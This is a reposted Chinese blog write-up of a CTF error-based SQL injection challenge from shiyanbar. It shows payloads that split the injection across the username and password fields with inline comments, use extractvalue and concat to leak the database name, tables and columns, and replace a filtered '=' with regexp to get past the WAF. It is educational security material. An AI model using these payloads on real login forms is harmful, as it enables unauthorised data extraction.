实验吧--加了料的报错注入

最新推荐文章于 2025-08-05 15:11:27 发布
转载 最新推荐文章于 2025-08-05 15:11:27 发布 · 107 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/AxsCtion/p/11027005.html
文章标签:

#php #数据库

本文详细介绍了在CTF竞赛中如何利用SQL注入爆破数据库的技巧,通过修改请求方法并构造payload,成功获取了数据库名、表名及列名,最终直接获得了flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接:http://ctf5.shiyanbar.com/web/baocuo/index.php

tips里面说post username and password...

我这里采用的抓包,也可以用hackbar

把get方式改为post后,放进repeater里面

构造第一条payload:username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select database()),0x7e)) or'

这里采用的函数是 extractvalue()concat() 以及/**/内联注释

extractvalue()的讲解是

  extractvalue():从目标XML中返回包含所查询值的字符串。
  EXTRACTVALUE (XML_document, XPath_string); 
  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
  第二个参数:XPath_string (Xpath格式的字符串)

concat函数是返回结果为连接参数产生的字符串

爆出数据库...

继续往下爆

下一条payload username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema regexp database()),0x7e)) or'

一开始尝试 where table_schema = database(),发现waf将 = 过滤掉了,采用regexp(mysql正则)

爆出表

 

 先试试第一个

payload username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name regexp 'ffll44jj'),0x7e)) or'

我丢。。flag出来了

 

转载于:https://www.cnblogs.com/AxsCtion/p/11027005.html

实验吧 后台登录writeup
JacobTsang的博客
10-29 283
1)解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 2)php源码: <php? $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($passw...
实验-报错注入
一个安全研究员
06-04 3731
前言 不得不说这一题对我来说挺有难度的,以前没有遇到过。看了别人的writeup过后,也想要记录一下,给自己攒攒经验 这题的解法有两种: (1)HPF(http parameter fragment) (2)exp()报错注入 HPF注入 查看源码: 就是要提交post数据,我直接在burpsuite里面操作。 随便输入两个参数,页面提示login failed。根据源码中的s...
实验-报错注入 Writeup
baynk的博客
07-31 294
这玩意弄了两天才搞完,昨天和朋友聊天聊到了12点。。1点多就困得不行了,没时间写,晚上利用自习时间先开个头,抢时间写完。。。 过程 进去后就有提示需要post用户名和密码,于是照着来了,没发现什么,于是审查一下源代码,发现有提示出连接数据库的语句。 手动试了下注入,发现过滤了注释和=号,也没什么有用的提示,所以就去用bp跑一下哪些字是被过滤的。 用户名那里过滤了不少东西,特别是括号"(",")"...
CTF实验- 报错注入分值
欢迎光临
12-11 495
  用burpsuit对username进行fuzz一下,发现过滤了超多东西, 被过滤就会显示 user name unknow error 或者Sql injection detected 或者Unknown password error. 没有过滤只会显示 Login failed # limit strsub union () , 没有过滤 extractvalue,up...
实验-web-报错注入(注释符/**/、post注入)
Sea_Sand息禅
03-17 510
页面提示,让post username和password,hackbar现在是越来越差劲了,直接用的bp。 报错注入来说,也有几个类型,不过这里我用的updatexml,经测试,extractvalue也是可以的。 首先,fuzz一下username和password: select、update这些都没有被过滤 而这些被过滤,系统识别是sql注入: 经测试,=是被SQL注...
实验吧——报错注入
xiaoyuer0123的博客
09-02 281
# -*- coding:utf8 -*- import requests import re def denglu(username,password): # 设置代理,用于调试过程中抓包分析 proxies = { "http": "http://localhost:9008", "https": "http://localhost:9008"...
实验吧 WEB 报错注入
fr4granc3
01-28 1513
没有用户名和密码的输入框,因此不能直接在URL中传递username和password参数。要使用hackbar或者burpsuit传。(还不太理解为什么) 首先尝试username=1&password=1,提示Login failed。 尝试username='or'1&password='or'1,提示You are our member, welcome to ...
报错注入-实验
xuchen16的博客
10-08 405
转载自:https://blog.youkuaiyun.com/xiaorouji/article/details/80587568 去fuzz一下waf可以看到username不能用括号,然鹅password不能用floor,updatexml,polygon,multipoint,extractvalue,geometrycollection,multinestring,mulpolygon,lines...
实验吧——WEB-简单的登录题、后台登录、报错注入、你真的会PHP吗?
迷风小白
03-29 2885
一. 简单的登录题 这道题确实一点都不简单 二、后台登录 这道题打开就是一个登录框,输入一个1,提示密码错误,查看源代码。 <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $r...
网络安全-sql注入实战-sql-labs(1~10)
09-02
4. 了解并实践各种注入方法,如布尔型盲注、时间型盲注、报错注入等。 5. 学习如何防范SQL注入,提高个人或企业Web应用的安全防御能力。 6. 练习利用现成的注入工具进行攻击,理解自动化工具的工作原理和限制。 7. ...
实验吧WP(web部分)【简单的登录题,后台登录,报错注入,认真一点,你真的会PHP吗?】
taozijun的博客
05-22 7521
一. 简单的登录题这道题一点也不简单,用到cbc字节翻转攻击等技术,先跳过这题,想了解可看实验吧上pcat大神的writeup。二. 后台登录这道题
aircrack-ng 介绍、功能测试及部分源码分析
热门推荐
m0_51937621的博客
01-17 1万+
aircrack-ng 介绍、功能测试及部分源码分析 【实验目的】 1、理清aircrack-ng的总体设计框架,包括各模块的功能与联系; 2、核心模块的实现原理(aircrack-ng、aireplay-ng、airodump-ng) 【实验要求】 1、 查找aircrack-ng软件相关资,搞清楚是什么的问题。 2、 分析aircrack-ng的功能以及对应的实现模块和各模块的依赖关系 3、 主要攻击方式和流程介绍 4、 对WPA/WPA2密方式和破解进行深入探究 5、 阅读aircrack-ng,
PHP-分支语句、while循环、for循环
m0_46471716的博客
08-04 595
default 标签和 if 中的 else 子句一样,它不是 switch 语句中必需的,可以。else if 语句和 else 语句一样,它延伸了 if 语句,else if 语句会根据不同的表达式来确定执行哪个语句。在上面的 else if 的语法中,如果第一个“判断条件 1”为 TRUE,则执行“语句块 1”语句;else 语句延伸了 if 语句,可以在 if 语句中表达式的值为 FALSE 时执行相应的语句。与 if 语句相同的是,如果“语句块 1”和“语句块 2”中都只包含一条语句的话,可。
从「同步」到「异步」:用 aiohttp 把 Python 网络 I/O 榨到极致
最新发布
Y234567890_的博客
08-05 708
本文探讨了Python中IO瓶颈问题及异步编程优势。通过对比同步请求、线程池和异步协程三种方案下载100张图片的性能表现,展示了aiohttp框架在并发处理上的高效性。同步方案耗时22秒,20线程池降至2.7秒,而异步方案仅需2.4秒且内存占用更低。文章详细解析了aiohttp客户端/服务端实现,包括连接控制、错误处理和流量限制等关键点,并对比了同步与异步的心智模型差异。最后给出实践建议:aiohttp适合高并发网络IO场景,但不适用于CPU密集型任务。异步编程的核心价值在于最大化利用CPU资源,将等待时间
Java实现与PHP兼容的MD5密技术详解
wolf23151269的博客
08-05 526
本文介绍了Java实现与PHP兼容的MD5密技术。主要内容包括:MD5算法特性概述;Java中实现与PHP结果一致的MD5密方法,重点解决字符编码差异问题;提供性能优化版本和文件MD5校验扩展实现;讨论了MD5的安全局限性和替代方案(如SHA-256、bcrypt)。文章通过测试用例验证了Java与PHP的MD5结果一致性,并解答了常见问题。虽然MD5已不推荐用于安全场景,但在非安全领域仍有应用价值。
小迪23年-22~27——php简单回顾(1)
2401_86399278的博客
08-02 928
这篇文章总结了原生开发中的留言板功能和后台验证实现。主要内容包括:1)PHP连接数据库的基本操作,如查询、删除、插入和更新;2)使用PHP超级全局变量接收浏览器数据并处理响应;3)留言板实现流程及安全注意事项(水平越权、XSS攻击等);4)三种鉴权技术(Cookie、Session、Token)的特点比较,重点介绍了Token验证的实现方式。文章通过代码示例展示了数据库连接、数据处理和安全验证的关键技术点。
K8S 性能瓶颈排查
weixin_43273856的博客
08-05 33
Kubernetes性能瓶颈排查指南摘要 随着业务增长,Kubernetes集群常出现性能问题。本文系统梳理了性能瓶颈排查的全景视角:从集群层面(API Server、Etcd)、节点层面(CPU/内存)、Pod层面(OOM/冷启动)、网络(DNS延迟)到存储(PVC挂载)等维度,提供了关键指标监控方法和常用工具矩阵(Prometheus、kube-state-metrics等)。特别强调建立全链路可观测体系,通过分层级监控(集群-节点-Pod)和精细化分析(网络/存储)来快速定位瓶颈,而非盲目排查。
菜鸟教程Shell笔记 数组 运算符 echo命令
UQWRJ的博客
08-01 336
数组中可以存放多个值。Bash Shell 只支持一维数组(不支持多维数组),初始化时不需要定义数组大小(与 PHP 类似)。与大部分编程语言类似,数组元素的下标由 0 开始。Shell 数组用括号来表示,元素用"空格"符号分割开读取数组关联数组Bash 支持关联数组,可以使用任意的字符串、或者整数作为下标来访问数组元素。关联数组使用 declare 命令来声明,语法格式。
sqli-labs 5、6报错注入通关方式
03-28
好的,我现在需要解决用户关于SQLi-Labs第5关和第6关的报错注入解法的问题。首先,我得回忆一下这两个关卡的特点。用户提到的是报错注入,所以可能需要利用数据库报错机制来获取信息。 根据引用中的信息,第5关是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值